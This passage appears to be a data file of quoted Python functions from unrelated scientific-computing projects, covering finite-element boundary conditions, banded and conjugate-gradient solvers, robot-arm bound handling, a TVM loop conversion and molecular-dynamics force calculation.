nodeToNeighboursMap[faceLoop[-1]]\n # Check if we have not reached the end of the loop i.e. the first element\n if mapIter[0] != faceLoop[0] and mapIter[1] != faceLoop[0]:\n if mapIter[0] == faceLoop[-2]:\n faceLoop.append(mapIter[1])\n elif mapIter[1] == faceLoop[-2]:\n faceLoop.append(mapIter[0])\n else:\n nodeToNeighboursMap.pop(faceLoop[0], None)\n\n nodeToNeighboursMap.pop(tmp, None)\n else:\n faceLoop = np.array(faceLoop)\n faceLoops.append(faceLoop)\n break\n\n return faceLoops", "def boundary_conditions(particle_outer_radius, boundary_temp):\n\n boundary_condition = [particle_outer_radius, boundary_temp]\n\n return boundary_condition", "def algorithm_loop(self):", "def solve_step(self, bc_left=0):\n status = 0\n self.t += self.dt\n\n\n ### Construct the RHS vector\n # Implicit terms\n #cff1 = 0. # Fully implicit\n #cff2 = 0.\n cff1 = 0.5*(1. - 2.*self.c_im)*self.dt\n cff2 = 0.5*self.c_im*self.dt\n RHS = cff1*self.L_rhs.dot(self.B) +\\\n cff2*self.L_rhs.dot(self.B_n_m1)\n\n # Nonlinear (explicit) terms\n cff3 = self.dt*(3 + self.b_ex)*0.5\n cff4 = -self.dt*(1+2*self.b_ex)*0.5\n cff5 = self.dt*(self.b_ex)*0.5\n \n RHS += cff3*self.calc_nonlinear_rhs(self.B)\n RHS += cff4*self.calc_nonlinear_rhs(self.B_n_m1)\n RHS += cff5*self.calc_nonlinear_rhs(self.B_n_m2)\n\n # Other terms from the time-derivative\n RHS += self.B\n\n # Add the BCs to the RHS\n cff0 = 0.5*(1 + self.c_im)*self.dt\n self.add_bcs(RHS, bc_left, cff0, cff1, cff2)\n\n # Use the direct banded matrix solver (faster)\n self.B_n_p1[:] = la.solve_banded( (self._j,self._j), self.L_lhs.data[::-1,:], RHS)\n\n # Check solutions\n if np.any( np.isnan(self.B_n_p1)):\n return -1\n\n # Update the terms last\n self.B_n_m2[:] = self.B_n_m1\n self.B_n_m1[:] = self.B\n self.B[:] = self.B_n_p1\n\n ## Update the boundary terms in these equations\n self.bcs[2] = self.bcs[1]\n self.bcs[1] = self.bcs[0]\n self.bcs[0] = bc_left\n\n return status", "def test_solvers_bc():\n tol = 3E-12 # Appropriate tolerance for these tests (P2, 20x20 mesh)\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x**2 + 2*y**2\n f = -sym.diff(u, x, 2) - sym.diff(u, y, 2)\n f = sym.simplify(f)\n u_00 = u.subs(x, 0) # x=0 boundary\n u_01 = u.subs(x, 1) # x=1 boundary\n g = -sym.diff(u, y).subs(y, 1) # x=1 boundary\n r = 1000 # arbitrary function can go here\n s = u\n\n # Turn to C/C++ code for UFL expressions\n f = sym.printing.ccode(f)\n u_00 = sym.printing.ccode(u_00)\n u_01 = sym.printing.ccode(u_01)\n g = sym.printing.ccode(g)\n r = sym.printing.ccode(r)\n s = sym.printing.ccode(s)\n print('Test problem (C/C++):\\nu = %s\\nf = %s' % (u, f))\n print('u_00: %s\\nu_01: %s\\ng = %s\\nr = %s\\ns = %s' %\n (u_00, u_01, g, r, s))\n\n # Turn into FEniCS objects\n u_00 = Expression(u_00)\n u_01 = Expression(u_01)\n f = Expression(f)\n g = Expression(g)\n r = Expression(r)\n s = Expression(s)\n u_exact = Expression(sym.printing.ccode(u))\n\n # Define boundary conditions\n boundary_conditions = {0: {'Dirichlet': u_00},\n 1: {'Dirichlet': u_01},\n 2: {'Robin': (r, s)},\n 3: {'Neumann': g}}\n\n for Nx, Ny in [(3,3), (3,5), (5,3), (20,20)]:\n for degree in 1, 2, 3:\n for linear_solver in ['direct']:\n print('solving on 2(%dx%dx) mesh with P%d elements'\n % (Nx, Ny, degree)),\n print(' %s solver, %s function' %\n (linear_solver, solver_func.__name__))\n kappa = Constant(1)\n u, kappa = solver_bc(\n kappa, f, boundary_conditions, Nx, Ny, degree,\n linear_solver=linear_solver,\n abs_tol=0.1*tol,\n rel_tol=0.1*tol)\n # Make a finite element function of the exact u_D\n V = u.function_space()\n u_e_Function = interpolate(u_exact, V) # exact solution\n # Check that dof arrays are equal\n u_e_array = u_e_Function.vector().array() # dof values\n max_error = (u_e_array - u.vector().array()).max()\n msg = 'max error: %g for 2(%dx%d) mesh, degree=%d,'\\\n ' %s solver, %s' % \\\n (max_error, Nx, Ny, degree, linear_solver,\n solver_func.__name__)\n print(msg)\n assert max_error < tol, msg", "def nonlinear_electroelastodynamics(optimise=True):\n\n mesh = Mesh()\n mesh.Parallelepiped(upper_right_front_point=(1,1,0.001),nx=10,ny=10,nz=1, element_type=\"hex\")\n\n mu = 5.0e4\n mu1 = mu\n mu2 = mu\n eps_2 = 4.0*8.8541e-12\n v = 0.4\n lamb = 2.*mu*v/(1-2.*v)\n material = IsotropicElectroMechanics_108(3, mu1=mu1, mu2=mu2, lamb=lamb, eps_2=eps_2, rho=1200.)\n\n formulation = DisplacementPotentialFormulation(mesh)\n\n\n def dirichlet_function(mesh):\n\n boundary_data = np.zeros((mesh.points.shape[0],4))+np.NAN\n\n Z_0 = np.logical_and(np.isclose(mesh.points[:,0],0.),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,1],0.),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,0],1),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,1],1),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n\n Z_0 = np.isclose(mesh.points[:,2],0.)\n boundary_data[Z_0,3] = 0.\n\n Z_0 = np.isclose(mesh.points[:,2],.001)\n boundary_data[Z_0,3] = 9e3\n\n return boundary_data\n\n boundary_condition = BoundaryCondition()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n nonlinear_static_solver = FEMSolver(total_time=60.,\n number_of_load_increments=25,\n analysis_nature=\"nonlinear\",\n analysis_type=\"static\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n )\n\n nonlinear_static_results = nonlinear_static_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n nonlinear_dynamic_solver = FEMSolver(total_time=60.,\n number_of_load_increments=250,\n analysis_nature=\"nonlinear\",\n analysis_type=\"dynamic\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n compute_energy_dissipation=True,\n compute_linear_momentum_dissipation=True,\n )\n\n nonlinear_dynamic_results = nonlinear_dynamic_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n # boundary_condition.__reset_state__()\n # boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n # nonlinear_dynamic_solver_exp = FEMSolver(total_time=6.,\n # number_of_load_increments=200000,\n # save_frequency=200000,\n # analysis_nature=\"nonlinear\",\n # analysis_type=\"dynamic\",\n # analysis_subtype=\"explicit\",\n # newton_raphson_tolerance=1e-5,\n # newton_raphson_solution_tolerance=1e-11,\n # optimise=optimise,\n # print_incremental_log=True,\n # )\n\n # nonlinear_dynamic_results_exp = nonlinear_dynamic_solver_exp.Solve(formulation=formulation, mesh=mesh,\n # material=material, boundary_condition=boundary_condition)\n\n\n boundary_condition.__reset_state__()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n linear_static_solver = FEMSolver(total_time=60.,\n number_of_load_increments=250,\n analysis_nature=\"linear\",\n analysis_type=\"static\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n )\n\n linear_static_results = linear_static_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n boundary_condition.__reset_state__()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n linear_dynamic_solver = FEMSolver(total_time=60.,\n number_of_load_increments=1000,\n analysis_nature=\"linear\",\n analysis_type=\"dynamic\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n break_at_increment=100,\n )\n\n linear_dynamic_results = linear_dynamic_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n s1 = nonlinear_static_results.GetSolutionVectors()\n s2 = nonlinear_dynamic_results.GetSolutionVectors()\n # s3 = nonlinear_dynamic_results_exp.GetSolutionVectors()\n s4 = linear_static_results.GetSolutionVectors()\n s5 = linear_dynamic_results.GetSolutionVectors()\n\n norm = lambda x: np.linalg.norm(x[:,2,-1])\n assert norm(s1) > 0.13 and norm(s1) < 0.15\n assert norm(s2) > 0.13 and norm(s2) < 0.15\n assert norm(s4) > 0.13 and norm(s4) < 0.15", "def _apply_boundary_conditions(self,t,dt):\n # update coloured noise generator\n self.noise_gen.update(dt)\n # extract four corner values for each of u and v fields as component\n # mean plus current noise generator output\n corner_mean_index = int(scipy.floor(t/self.wind_update_period))\n added_noise = self.noise_gen.output\n (u_tl, u_tr, u_bl, u_br, v_tl, v_tr, v_bl, v_br) = \\\n added_noise + self._corner_means[corner_mean_index,:]\n # linearly interpolate along edges\n self._u[:, 0] = u_tl + self._rx * (u_tr - u_tl) # u top edge\n self._u[:, -1] = u_bl + self._rx * (u_br - u_bl) # u bottom edge\n self._u[0, :] = u_tl + self._ry * (u_bl - u_tl) # u left edge\n self._u[-1, :] = u_tr + self._ry * (u_br - u_tr) # u right edge\n self._v[:, 0] = v_tl + self._rx * (v_tr - v_tl) # v top edge\n self._v[:, -1] = v_bl + self._rx * (v_br - v_bl) # v bottom edge\n self._v[0, :] = v_tl + self._ry * (v_bl - v_tl) # v left edge\n self._v[-1, :] = v_tr + self._ry * (v_br - v_tr) # v right edge", "def _solve_implicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n l_and_u = (1, 1)\n ab = np.empty((3, self.n_x))\n # main diagonal\n ab[1] = 1 + 2.0 * coeff\n # upper and lower diagonals\n ab[0] = ab[2] = -coeff\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n ab[0][1] = 0 # upper diagonal\n ab[1][0] = 1 # main diagonal\n elif self.left_bc_type == \"NEUMANN\":\n ab[0][1] = 1 # upper diagonal\n ab[1][0] = -1 # main diagonal\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n ab[1][-1] = 1 # main diagonal\n ab[2][-2] = 0 # lower diagonal\n elif self.right_bc_type == \"NEUMANN\":\n ab[1][-1] = 1 # main diagonal\n ab[2][-2] = -1 # lower diagonal\n\n current_solution = initial_conditions\n solutions = []\n\n for t in self.t_grid:\n b = current_solution + self.tau * self.rhs(self.x_grid, t)\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n b[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n b[0] = self.h * self.left_bc(t)\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n b[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n b[-1] = self.h * self.right_bc(t)\n\n next_solution = solve_banded(l_and_u, ab, b)\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def _handle_bounds_speedj(self):\n inside_bound, inside_buffer_bound, mat, xyz = self._check_bound(self._qt_[-1])\n inside_angle_bound = np.all(self._angles_low <= self._qt_[-1, self._joint_indices]) and \\\n np.all(self._qt_[-1, self._joint_indices] <= self._angles_high)\n if inside_bound:\n self.return_point = None\n if inside_angle_bound:\n self.angle_return_point = False\n if not inside_bound:\n if self.return_point is None:\n # we are outside the bounds and return point wasn't computed yet\n print(\"outside box bound\")\n xyz = np.clip(xyz, self._end_effector_low + self._box_bound_buffer,\n self._end_effector_high - self._box_bound_buffer)\n mat[:3, 3] = xyz\n ref_pos = self._q_ref.copy()\n ref_pos[self._joint_indices] = self._q_[-1, self._joint_indices]\n solutions = ur_utils.inverse_near(mat, wrist_desired=self._q_ref[-1], ref_pos=ref_pos,\n params=self._ik_params)\n servoj_q = self._q_ref.copy()\n if len(solutions) == 0:\n servoj_q[self._joint_indices] = self._q_[-1, self._joint_indices]\n else:\n servoj_q[self._joint_indices] = solutions[0][self._joint_indices]\n self.return_point = servoj_q[self._joint_indices]\n # Speed at which arm approaches the boundary. The faster this speed,\n # the larger opposite acceleration we need to apply in order to slow down\n self.init_boundary_speed = np.max(np.abs(self._qd_.copy()))\n # if return point is already computed, keep going to it, no need\n # to recompute it at every time step\n self._cmd_ = self.return_point - self._q_[0][self._joint_indices]\n # Take the direction to return point and normalize it to have norm 0.1\n if np.linalg.norm(self._cmd_) != 0:\n self._cmd_ /= np.linalg.norm(self._cmd_) / 0.1\n\n self._speedj_packet[1:1 + 6][self._joint_indices] = self._cmd_\n # This acceleration guarantees that we won't move beyond\n # the bounds by more than 0.05 radian on each joint. This\n # follows from kinematics equations.\n accel_to_apply = np.max(np.abs(self._qd_)) * self.init_boundary_speed / 0.05\n\n # self.boundary_packet[1:1 + 6][self.joint_indices] = self.return_point\n # self.actuator_comms['UR5'].actuator_buffer.write(self.reset_packet)\n # time.sleep(1.0)\n self._speedj_packet[-2] = np.clip(accel_to_apply, 2.0, 5.0)\n self._actuation_packet_['UR5'] = self._speedj_packet\n self._cmd_.fill(0.0)\n self._cmd_prev_.fill(0.0)\n self._first_deriv_.fill(0.0)\n\n elif not inside_angle_bound:\n # if return point is already computed, keep going to it, no need\n self.rel_indices = self._joint_indices\n cur_pos = self._q_[0][self._joint_indices]\n clipped_pos = np.clip(cur_pos, self._angles_low + self._angle_bound_buffer,\n self._angles_high - self._angle_bound_buffer)\n # a point within the box to which we will be returning\n affected_joints = np.where(clipped_pos != cur_pos)\n if not self.angle_return_point:\n print(\"outside of angle bound on joints %r\" % (list(affected_joints[0])))\n self.angle_return_point = True\n self._cmd_[affected_joints] = np.sign(clipped_pos - cur_pos)[affected_joints]*np.max(np.abs(self._cmd_))\n self._speedj_packet[1:1 + 6][self._joint_indices] = self._cmd_\n self._actuation_packet_['UR5'] = self._speedj_packet", "def make_divergence(bcs: Boundaries) -> OperatorType:\n assert isinstance(bcs.grid, CylindricalSymGrid)\n bcs.check_value_rank(0)\n boundary_r, boundary_z = bcs\n\n # calculate preliminary quantities\n dim_r, dim_z = bcs.grid.shape\n dr = bcs.grid.discretization[0]\n scale_r, scale_z = 1 / (2 * bcs.grid.discretization)\n\n value_outer = boundary_r.high.make_virtual_point_evaluator()\n region_z = boundary_z.make_region_evaluator()\n\n # use processing for large enough arrays\n parallel = dim_r * dim_z >= config[\"numba.parallel_threshold\"]\n\n @jit_allocate_out(parallel=parallel, out_shape=(dim_r, dim_z))\n def divergence(arr, out=None):\n \"\"\"apply divergence operator to array `arr`\"\"\"\n for j in nb.prange(0, dim_z): # iterate axial points\n # inner radial boundary condition\n i = 0\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n d_r = (arr[0, 1, j] + 3 * arr[0, 0, j]) * scale_r\n d_z = (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_r + d_z\n\n for i in range(1, dim_r - 1): # iterate radial points\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n d_r = (arr[0, i + 1, j] - arr[0, i - 1, j]) * scale_r\n d_r += arr[0, i, j] / ((i + 0.5) * dr)\n d_z = (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_r + d_z\n\n # outer radial boundary condition\n i = dim_r - 1\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n arr_r_h = value_outer(arr[0], (i, j))\n d_r = (arr_r_h - arr[0, i - 1, j]) * scale_r\n d_r += arr[0, i, j] / ((i + 0.5) * dr)\n d_z = (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_z + d_r\n\n return out\n\n return divergence # type: ignore", "def create_bcs(dim, H, Hmin, HZ, HminZ, XYZ, inlet_velocity,\n V_0, solutes, subdomains_file,\n enable_NS, enable_PF, enable_EC, \n mesh, boundaries_Facet, **namespace):\n mvc = df.MeshValueCollection(\"size_t\", mesh, dim-1) \n with df.XDMFFile(subdomains_file) as infile:\n infile.read(mvc, \"name_to_read\")\n facet_domains = df.cpp.mesh.MeshFunctionSizet(mesh, mvc)\n\n # Re-create boundaries with facet_domain for mesh relevance\n\n boundaries = dict(\n inlet = [facet_domains, boundaries_Facet[\"inlet\"]],\n outletL = [facet_domains, boundaries_Facet[\"outletL\"]],\n outletR = [facet_domains, boundaries_Facet[\"outletR\"]],\n wall = [facet_domains, boundaries_Facet[\"wall\"]],\n )\n\n # Alocating the boundary dicts\n bcs = dict()\n bcs_pointwise = dict()\n for boundary in boundaries:\n bcs[boundary] = dict()\n\n ## Velocity Phase Flow In (Retrieve expression)\n #\n #length inlet, water inflow, X/Y/Z, Positive/neg flow along axis\n velocity_expr = velocity_init(H, HZ, inlet_velocity, XYZ, 1, Hmin, HminZ) \n velocity_in = Fixed(velocity_expr)\n\n # Pressure set to 0 at outlet\n pressure_out = Pressure(0.0)\n # Create NoSlip function for walls\n noslip = Fixed((0., 0., 0.)) # Unlike 2D \"NoSlip()\", need 3 dimensions\n\n ## Define boundaries\n # Note we have two outlets\n if enable_NS:\n bcs[\"inlet\"][\"u\"] = velocity_in\n bcs[\"outletL\"][\"p\"] = pressure_out\n bcs[\"outletR\"][\"p\"] = pressure_out\n bcs[\"wall\"][\"u\"] = noslip\n\n # Ensure all processes have completed (Might be redundant) \n mpi_barrier()\n return boundaries, bcs, bcs_pointwise", "def outer_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij, gamma_ij, N):\n # Compute Bethe energy\n bethe_E = bethe_free_energy(b_i, b_ij, psi_i, phi_ij, N)\n conv_crit = numpy.inf\n bethe = [bethe_E]\n triu_idx = numpy.triu_indices(N, 1)\n while conv_crit > 1e-5:\n # Until convergence update Lagrange multipliers and beliefs\n lambda_ij, gamma_ij = inner_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij,\n gamma_ij, N)\n b_i, b_ij = update_beliefs(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n # Compute Bethe energy\n bethe_E_old = bethe_E\n # Compute bethe free energy\n bethe_E = bethe_free_energy(b_i, b_ij, psi_i, phi_ij, N)\n bethe.append(bethe_E)\n conv_crit = numpy.absolute((bethe_E_old - bethe_E) / bethe_E_old)\n\n return b_i, b_ij, bethe_E", "def _while_loop(self):\n bind_map = {}\n wl = set_span(tvm.relay.var(\"while_loop\"), self._loop_name)\n sb = tvm.relay.scope_builder.ScopeBuilder()\n\n lv_list = []\n expr_list = []\n extra_vars = []\n\n for i, lv in enumerate(self.loop_vars):\n if self._loop_name not in self._lvar2expr:\n self._lvar2expr[self._loop_name] = {}\n\n # Handle the case when loop var is not properly lifted.\n # This can happen when loop var node name is set accidentally\n # beginning with loop name.\n if lv not in self._lvar2expr[self._loop_name]:\n var_name = f\"{self._loop_name}_loop_var_{i}\"\n var_type = _infer_type(lv, self._mod).checked_type\n loop_var = set_span(tvm.relay.var(var_name, type_annotation=var_type), var_name)\n self._lvar2expr[self._loop_name][loop_var] = lv\n bind_map[lv] = loop_var\n self.loop_vars[i] = loop_var\n lv = loop_var\n\n lv_list.append(lv)\n expr_list.append(self._lvar2expr[self._loop_name][lv])\n\n if bind_map:\n self.cond = rewrite_subgraph(self.cond, bind_map)\n self.body = [rewrite_subgraph(b, bind_map) for b in self.body]\n\n cond = set_span(tvm.relay.op.min(self.cond), self.cond.span)\n\n for lv, exp in self._lvar2expr[self._loop_name].items():\n if lv not in self.loop_vars:\n var_checker = VarChecker(lv)\n for bd in self.body + [cond]:\n var_checker.visit(bd)\n if var_checker.used:\n lv_list.append(lv)\n expr_list.append(exp)\n extra_vars.append(lv)\n break\n\n with sb.if_scope(cond):\n sb.ret(wl(*list(self.body + extra_vars)))\n with sb.else_scope():\n sb.ret(tvm.relay.Tuple(lv_list))\n\n loop_fn = tvm.relay.Function(lv_list, sb.get())\n sb = tvm.relay.scope_builder.ScopeBuilder()\n sb.let(wl, loop_fn)\n loop_ret = wl(*expr_list)\n\n sb.ret(loop_ret)\n ret = sb.get()\n return ret", "def preCondConjugateGradientSolver(b, x, linsys_setup, eps, i_max, plotInterval, mapDir):\n datamaps, ninvs, beams, freqs, power_2d, precond_2d, clumaps, g_nu, \\\n map_prop = linsys_setup\n nx, ny, pixScaleX, pixScaleY = map_prop\n nCluster = len(clumaps[0])\n ksz = False\n if len(clumaps)==2: ksz=True\n \n \n # Calculate residual r = b - (A^-1) x\n r = b - applyMat(x, linsys_setup)\n d = r\n\n\n delta_new = numpy.inner(r,r)\n \n\n\n\n delta_o = delta_new\n delta_array = numpy.zeros(shape=(i_max))\n \n # Iterate CG solver until converged\n i = 0\n #i_max = 300\n while (i < i_max) and (delta_new > delta_o*eps**2.):\n if i==0: t = time.time()\n \n if i%plotInterval == 0 and i != 0:\n print \"\\tNumber of iterations in the CG:\", i\n x0 = x[:nx*ny] # CMB\n x1 = x[nx*ny:nx*ny+1] # Monopole\n x2 = x[nx*ny+1:nx*ny+1+nCluster] # TSZ\n if ksz: x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n print \"\\tMonopole:\", x1\n print \"\\tTSZ:\", x2\n if ksz: print \"\\tKSZ:\", x3\n \n x0.shape = (ny,nx)\n a_l = numpy.fft.fft2(x0)\n a_l *= precond_2d\n x_test = numpy.real(numpy.fft.ifft2(a_l))\n plot(x_test,mapDir+'/CMB_%d.png'%i,'Reconstructed CMB', range=(-250., 250.))\n print delta_new, delta_o*eps**2.\n\n q = applyMat(d, linsys_setup)\n alpha = delta_new / (numpy.inner(d,q))\n x += alpha * d\n\n # What does this do? It's always false.\n if i/50. < numpy.int(i/50):\n r = b - applyMat(x, linsys_setup)\n else:\n r = r - alpha*q\n \n delta_old = delta_new\n delta_new = numpy.inner(r,r)\n beta = delta_new/delta_old\n d = r + beta * d\n #if i==0: print \"\\tEach iteration takes:\", time.time()-t\n i += 1\n\n x0 = x[:nx*ny].reshape((ny, nx))\n x1 = x[nx*ny:nx*ny+1]\n x2 = x[nx*ny+1:nx*ny+1+nCluster]\n if ksz:\n x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n else:\n x3 = None\n \n a_l = numpy.fft.fft2(x0) * precond_2d\n x0 = numpy.real(numpy.fft.ifft2(a_l))\n\n \n # CMB, monopole, TSZ, KSZ\n return x0, x1, x2, x3", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = 